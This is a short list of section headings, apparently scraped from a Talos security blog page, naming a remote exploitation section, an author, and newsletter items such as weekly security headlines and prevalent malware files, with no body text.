
Remote Exploitation

Conclusion

References

About the author

Wiebe Willems

The one big thing

Why do I care?

So now what?

Top security headlines of the week

Can’t get enough Talos?

Upcoming events where you can find Talos

Most prevalent malware files from Talos telemetry over the past week